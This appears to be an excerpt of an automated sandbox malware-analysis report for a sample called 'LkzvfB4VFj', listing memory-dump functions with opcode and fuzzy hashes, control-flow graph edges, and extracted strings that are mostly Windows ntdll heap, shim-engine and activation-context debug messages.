                                                  • Instruction Fuzzy Hash: 4790023520100843D50072584504B47001547E0301F91C85BA4114614DC625C9557561
                                                  Function 35FD2B10 Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e45974b4c19ab25361a98e2255ccfdf9362de801edae8bed00df13ff8c031541
                                                  • Instruction ID: a39a90743d21260232fe26a411ae19178739ea01864483aef8918f24a61c3302
                                                  • Opcode Fuzzy Hash: e45974b4c19ab25361a98e2255ccfdf9362de801edae8bed00df13ff8c031541
                                                  • Instruction Fuzzy Hash: BF90023520100803D5807258450464B001547D1301FD1C85AA4015614DCA258B5D77E1
                                                  Function 35FD2B00 Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 97b3cb02e95566c165045397cda95fcf50033dfd3f503843aed28125486c08ef
                                                  • Instruction ID: e7b9192c53154fd188b932746fb1dba8edefe4ad620d1e4b88612fd71bb4bb32
                                                  • Opcode Fuzzy Hash: 97b3cb02e95566c165045397cda95fcf50033dfd3f503843aed28125486c08ef
                                                  • Instruction Fuzzy Hash: 6090023520504843D54072584504A47002547D0305F91C856A4054654DD6358E59B6A1
                                                  Function 35FD2AC0 Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 9e8b6dd9a485a2cd601f3d03ab281af44829b8dd2b439cf0e8c86259a13d0a2a
                                                  • Instruction ID: 041311ab0202321545d3fc6d52ea90617187d1e995e190e1f83933095ceaaca9
                                                  • Opcode Fuzzy Hash: 9e8b6dd9a485a2cd601f3d03ab281af44829b8dd2b439cf0e8c86259a13d0a2a
                                                  • Instruction Fuzzy Hash: F690023560500803D55072584514747001547D0301F91C856A4014614DC7658B5976E1
                                                  Function 35FD2AA0 Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: ce1ca6c45d31e38169d38e766164fe8e6395e563c0e1e2873788bdd9edf8d5d1
                                                  • Instruction ID: 5ef6c356a37beaefafe3a0267644377bccef586f6041c6d6214403be1b01f3af
                                                  • Opcode Fuzzy Hash: ce1ca6c45d31e38169d38e766164fe8e6395e563c0e1e2873788bdd9edf8d5d1
                                                  • Instruction Fuzzy Hash: 1C90023520100803D50472584904687001547D0301F91C856AA014615ED67589957171
                                                  Function 35FD2A80 Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: e9890b83e563ba2a642c95577450999901095ff994aa22e775354eb375174421
                                                  • Instruction ID: dbf8f517e0005b9bb32ee045d12dd57841c6db10958719a1348eb87d66d29d78
                                                  • Opcode Fuzzy Hash: e9890b83e563ba2a642c95577450999901095ff994aa22e775354eb375174421
                                                  • Instruction Fuzzy Hash: 0790026520200003850572584514617401A47E0201F91C866E5004550DC53589957165
                                                  Function 35FD2A10 Relevance: .0, Instructions: 4COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 5fa8d4e6d7398f9a1329e6871b6006f279d1349ea710c8f0306a566fddca39b6
                                                  • Instruction ID: 652a6192bfd8174cf78db228a0956a58b55a48586431d04c69e8ee5d1037d9f8
                                                  • Opcode Fuzzy Hash: 5fa8d4e6d7398f9a1329e6871b6006f279d1349ea710c8f0306a566fddca39b6
                                                  • Instruction Fuzzy Hash: 90900229221000034545B658070450B045557D63517D1C85AF5406550CC63189696361
                                                  Function 35FD2B20 Relevance: .0, Instructions: 2COMMON
                                                  Download Yara Rule
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                  • Instruction ID: c9e8e5d02229a646cbd5dc8f2d001ff8e8a5c43e69ca63b80a2bfb97148c9154
                                                  • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                                  • Instruction Fuzzy Hash:
                                                  Function 35CEDEA1 Relevance: 56.5, Strings: 45, Instructions: 256COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 43 35cedea1-35cedea3 44 35cede34-35cede3d 43->44 45 35cedea5-35cee087 43->45 46 35cede3f-35cede42 44->46 47 35cede43-35cede98 44->47 48 35cee089-35cee094 45->48 46->47 48->48 50 35cee096-35cee0b1 48->50 52 35cee0b7-35cee0d0 50->52 53 35cee144-35cee148 50->53 56 35cee0d8-35cee13a 52->56 54 35cee16a-35cee16e 53->54 55 35cee14a-35cee167 53->55 58 35cee170-35cee18e 54->58 59 35cee191-35cee195 54->59 55->54 56->56 57 35cee13c-35cee13d 56->57 57->53 58->59 60 35cee197-35cee1af 59->60 61 35cee1b2-35cee1cb 59->61 60->61
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680565927.0000000035CE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 35CE0000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35ce0000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                  • API String ID: 0-3558027158
                                                  • Opcode ID: d8b02a185a5f937afb637971aba499015bf7518cdea8f3a687aaaf28ad4ad241
                                                  • Instruction ID: cf55f8c557ed264495973910411f52e9c9bc775d6cb3dbedeb9511ae52c66c14
                                                  • Opcode Fuzzy Hash: d8b02a185a5f937afb637971aba499015bf7518cdea8f3a687aaaf28ad4ad241
                                                  • Instruction Fuzzy Hash: AEA171F040C2948AC7198F54A0612AFFFB1EBC6305F15816DE6E6BB243C37E8945CB95
                                                  Function 05C8DEA1 Relevance: 56.5, Strings: 45, Instructions: 256COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 5 5c8dea1-5c8dea3 6 5c8de34-5c8de3d 5->6 7 5c8dea5-5c8e087 5->7 9 5c8de3f-5c8de42 6->9 10 5c8de43-5c8de98 6->10 8 5c8e089-5c8e094 7->8 8->8 12 5c8e096-5c8e0b1 8->12 9->10 14 5c8e144-5c8e148 12->14 15 5c8e0b7-5c8e0d0 12->15 17 5c8e16a-5c8e16e 14->17 18 5c8e14a-5c8e167 14->18 16 5c8e0d8-5c8e13a 15->16 16->16 19 5c8e13c-5c8e13d 16->19 20 5c8e170-5c8e18e 17->20 21 5c8e191-5c8e195 17->21 18->17 19->14 20->21 22 5c8e1b2-5c8e1cb 21->22 23 5c8e197-5c8e1af 21->23 23->22
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93668651185.0000000005C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 05C80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_5c80000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                  • API String ID: 0-3558027158
                                                  • Opcode ID: d8b02a185a5f937afb637971aba499015bf7518cdea8f3a687aaaf28ad4ad241
                                                  • Instruction ID: fbc7e46c237fd06e84955598160471b8ac3cb09c90d8c847a4502261fdd56e7d
                                                  • Opcode Fuzzy Hash: d8b02a185a5f937afb637971aba499015bf7518cdea8f3a687aaaf28ad4ad241
                                                  • Instruction Fuzzy Hash: 7CA172F040C2948AC7198F58A0652AFFFB1EBC6305F15816DE6E6BB243C37E8945CB95
                                                  Function 35C8DEA1 Relevance: 56.5, Strings: 45, Instructions: 256COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 24 35c8dea1-35c8dea3 25 35c8de34-35c8de3d 24->25 26 35c8dea5-35c8e087 24->26 27 35c8de3f-35c8de42 25->27 28 35c8de43-35c8de98 25->28 29 35c8e089-35c8e094 26->29 27->28 29->29 31 35c8e096-35c8e0b1 29->31 33 35c8e144-35c8e148 31->33 34 35c8e0b7-35c8e0d0 31->34 36 35c8e16a-35c8e16e 33->36 37 35c8e14a-35c8e167 33->37 35 35c8e0d8-35c8e13a 34->35 35->35 38 35c8e13c-35c8e13d 35->38 39 35c8e170-35c8e18e 36->39 40 35c8e191-35c8e195 36->40 37->36 38->33 39->40 41 35c8e1b2-35c8e1cb 40->41 42 35c8e197-35c8e1af 40->42 42->41
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680401460.0000000035C80000.00000040.00001000.00020000.00000000.sdmp, Offset: 35C80000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35c80000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: !"#$$%&'($)*+,$-./0$123@$4567$89:;$<=@@$?$@@@?$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@
                                                  • API String ID: 0-3558027158
                                                  • Opcode ID: d8b02a185a5f937afb637971aba499015bf7518cdea8f3a687aaaf28ad4ad241
                                                  • Instruction ID: 7d13a77d41cb2895d42acd5905ddcb9b1f0904494bf18684d5047ac41c8185c2
                                                  • Opcode Fuzzy Hash: d8b02a185a5f937afb637971aba499015bf7518cdea8f3a687aaaf28ad4ad241
                                                  • Instruction Fuzzy Hash: D1A172F040C2948AC7198F54A0612AFFFB1EBC6309F15816DE6E6BB243C37E8945CB95
                                                  Function 3606A1F0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 285timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: HEAP:
                                                  • API String ID: 3446177414-2466845122
                                                  • Opcode ID: 40314db9b9cc9d3005dc2c3da9642e680d77c8c63a7dee8f39ad6e1f89224c16
                                                  • Instruction ID: aedf02dbef594127ca7e1be20f41e6bdd8ab2558cdeb767b267b854290cfc92d
                                                  • Opcode Fuzzy Hash: 40314db9b9cc9d3005dc2c3da9642e680d77c8c63a7dee8f39ad6e1f89224c16
                                                  • Instruction Fuzzy Hash: 79A1BE71B143218FD704EE1AC892A1ABBE5FF88358F1445ADE945EB310EBB0EC45CB91
                                                  Function 35FC7550 Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 194COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  • CLIENT(ntdll): Processing %ws for patching section protection for %wZ, xrefs: 3600454D
                                                  • CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database, xrefs: 36004507
                                                  • CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions, xrefs: 36004460
                                                  • CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ, xrefs: 36004530
                                                  • CLIENT(ntdll): Processing section info %ws..., xrefs: 36004592
                                                  • ExecuteOptions, xrefs: 360044AB
                                                  • Execute=1, xrefs: 3600451E
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: CLIENT(ntdll): Found CheckAppHelp = %d for %wZ in ImageFileExecutionOptions$CLIENT(ntdll): Found Execute=1, turning off execution protection for the process because of %wZ$CLIENT(ntdll): Found ExecuteOptions = %ws for %wZ in application compatibility database$CLIENT(ntdll): Processing %ws for patching section protection for %wZ$CLIENT(ntdll): Processing section info %ws...$Execute=1$ExecuteOptions
                                                  • API String ID: 0-484625025
                                                  • Opcode ID: a2c32b77182c2d9ef4cf84ece18aed88043a4657e028f2b6c139a16bb9517d10
                                                  • Instruction ID: 23b93ad5687afc53444e1c5241be854b42b10cabde65d514343774d45a9dd0a7
                                                  • Opcode Fuzzy Hash: a2c32b77182c2d9ef4cf84ece18aed88043a4657e028f2b6c139a16bb9517d10
                                                  • Instruction Fuzzy Hash: 975107B5A0131AAAEB10DBA5DC86FAD77B8AF04340F440CFDD905A7181DB709A45CFA4
                                                  Function 35FAA170 Relevance: 12.7, APIs: 1, Strings: 6, Instructions: 404COMMON
                                                  Download Yara Rule
                                                  Strings
                                                  • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 35FF77E2
                                                  • SsHd, xrefs: 35FAA304
                                                  • RtlpFindActivationContextSection_CheckParameters, xrefs: 35FF77DD, 35FF7802
                                                  • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 35FF7807
                                                  • Actx , xrefs: 35FF7819, 35FF7880
                                                  • RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section, xrefs: 35FF78F3
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID: Actx $RtlFindActivationContextSectionString() found section at %p (length %lu) which is not a string section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.$SsHd
                                                  • API String ID: 0-1988757188
                                                  • Opcode ID: f49b0adb7812ead2325c55767f79405fdaaa3efccc2ce23adacf843f0edae624
                                                  • Instruction ID: 501071f733ae27538155dc32b9fad2e8cd5d38371a31dbf256c1dccc1b446926
                                                  • Opcode Fuzzy Hash: f49b0adb7812ead2325c55767f79405fdaaa3efccc2ce23adacf843f0edae624
                                                  • Instruction Fuzzy Hash: 17E1B2766083818FE715CE24C890B5BB7E5BB84354F504F2DECA68B6A0D772D849CF92
                                                  Function 35FAD690 Relevance: 12.6, APIs: 1, Strings: 6, Instructions: 372timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  • SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 35FF9153
                                                  • RtlpFindActivationContextSection_CheckParameters, xrefs: 35FF914E, 35FF9173
                                                  • SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx., xrefs: 35FF9178
                                                  • RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section, xrefs: 35FF9372
                                                  • Actx , xrefs: 35FF9315
                                                  • GsHd, xrefs: 35FAD794
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: Actx $GsHd$RtlFindActivationContextSectionGuid() found section at %p (length %lu) which is not a GUID section$RtlpFindActivationContextSection_CheckParameters$SXS: %s() flags contains return_assembly_metadata but they don't fit in size, return invalid_parameter 0x%08lx.$SXS: %s() flags contains return_flags but they don't fit in size, return invalid_parameter 0x%08lx.
                                                  • API String ID: 3446177414-2196497285
                                                  • Opcode ID: 9fe622c169cd711a570aee5284815a93e5401d5f6ed32165e526e3ef1668870b
                                                  • Instruction ID: 2861008fa459034cdf9073a31925c2d485656909b641cf6dce138a7e6a8322d4
                                                  • Opcode Fuzzy Hash: 9fe622c169cd711a570aee5284815a93e5401d5f6ed32165e526e3ef1668870b
                                                  • Instruction Fuzzy Hash: 23E168B66083428BE700CE14C980B4BB7F9BF88758F414E6DE995CB691D771E944CF92
                                                  Function 35F8640D Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 150timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • RtlDebugPrintTimes.NTDLL ref: 35F8651C
                                                    • Part of subcall function 35F86565: RtlDebugPrintTimes.NTDLL ref: 35F86614
                                                    • Part of subcall function 35F86565: RtlDebugPrintTimes.NTDLL ref: 35F8665F
                                                  Strings
                                                  • Getting the shim engine exports failed with status 0x%08lx, xrefs: 35FE9790
                                                  • Building shim engine DLL system32 filename failed with status 0x%08lx, xrefs: 35FE977C
                                                  • Loading the shim engine DLL failed with status 0x%08lx, xrefs: 35FE97B9
                                                  • apphelp.dll, xrefs: 35F86446
                                                  • minkernel\ntdll\ldrinit.c, xrefs: 35FE97A0, 35FE97C9
                                                  • LdrpInitShimEngine, xrefs: 35FE9783, 35FE9796, 35FE97BF
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: Building shim engine DLL system32 filename failed with status 0x%08lx$Getting the shim engine exports failed with status 0x%08lx$LdrpInitShimEngine$Loading the shim engine DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                  • API String ID: 3446177414-204845295
                                                  • Opcode ID: 409c527a56085f349ce6ef5dca26479113ab7bc7fb4e6192743b4585d7bf22b8
                                                  • Instruction ID: 035a3a35dc2d28df25efc5f0feed2327fa05568e480d8d50449344e1ac81ba4b
                                                  • Opcode Fuzzy Hash: 409c527a56085f349ce6ef5dca26479113ab7bc7fb4e6192743b4585d7bf22b8
                                                  • Instruction Fuzzy Hash: 215180716083089FE325DF24C991E5B77E9FF94784F400D1AFA95971A0DB30D909CBA2
                                                  Function 3600FA02 Relevance: 12.4, APIs: 2, Strings: 5, Instructions: 109timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: $$Failed to find export %s!%s (Ordinal:%d) in "%wZ" 0x%08lx$LdrpRedirectDelayloadFailure$Unknown$minkernel\ntdll\ldrdload.c
                                                  • API String ID: 3446177414-4227709934
                                                  • Opcode ID: 6cd3b933811a35f4194e82c4d5f759d746d2b02e0279be6148ccb759a152e411
                                                  • Instruction ID: 4f3e18d4c5ee6458471b9c3d474fe1f857ea23fc8fd8538ce7a487a73dda30b5
                                                  • Opcode Fuzzy Hash: 6cd3b933811a35f4194e82c4d5f759d746d2b02e0279be6148ccb759a152e411
                                                  • Instruction Fuzzy Hash: 5E413BB9E00209ABEB05DF99C982ADEBFF5BF88354F2000A9ED04A7240D7719941DF90
                                                  Function 3603F8F8 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 190timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: About to free block at %p$About to free block at %p with tag %ws$HEAP: $HEAP[%wZ]: $RtlFreeHeap
                                                  • API String ID: 3446177414-3492000579
                                                  • Opcode ID: 504294e2252b98c0ee3e0709757520e110d789eae1cafd8f2b557b28edbd1246
                                                  • Instruction ID: 3d12f5b73c630ff85a886d4e0c5dd2b32a5cb6005b5f50c31612c0815e71dd91
                                                  • Opcode Fuzzy Hash: 504294e2252b98c0ee3e0709757520e110d789eae1cafd8f2b557b28edbd1246
                                                  • Instruction Fuzzy Hash: F271F0B5A02648AFCB05DFA8C4926ADFFF2FF49304F64849AE485AB251CB359941CB50
                                                  Function 35F86565 Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 184timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  • Initializing the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 35FE9885
                                                  • minkernel\ntdll\ldrinit.c, xrefs: 35FE9854, 35FE9895
                                                  • Loading the shim DLL "%wZ" failed with status 0x%08lx, xrefs: 35FE9843
                                                  • LdrpLoadShimEngine, xrefs: 35FE984A, 35FE988B
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                  • API String ID: 3446177414-3589223738
                                                  • Opcode ID: a7763c4cd95499f2611bfcf9a85f9d95aea51a381a8d06a46af64f29a88b45bb
                                                  • Instruction ID: 28539a206d004062715d60624d9f6c3a4dea8213b050e005af02d53c6eabb80e
                                                  • Opcode Fuzzy Hash: a7763c4cd95499f2611bfcf9a85f9d95aea51a381a8d06a46af64f29a88b45bb
                                                  • Instruction Fuzzy Hash: F3511376B0034C9BDB18DBA8C856F9D7BB6BB60304F450969E651BF296CB709C42CB90
                                                  Function 35FBDA20 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 133timeCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000003.00000002.93680641603.0000000035F60000.00000040.00001000.00020000.00000000.sdmp, Offset: 35F60000, based on PE: true
                                                  • Associated: 00000003.00000002.93680641603.0000000036089000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  • Associated: 00000003.00000002.93680641603.000000003608D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_3_2_35f60000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: DebugPrintTimes
                                                  • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlUnlockHeap
                                                  • API String ID: 3446177414-3224558752
                                                  • Opcode ID: 607b49dcbf34491b43daaacd7991541b54aa080186ad389761134b94d434d4aa
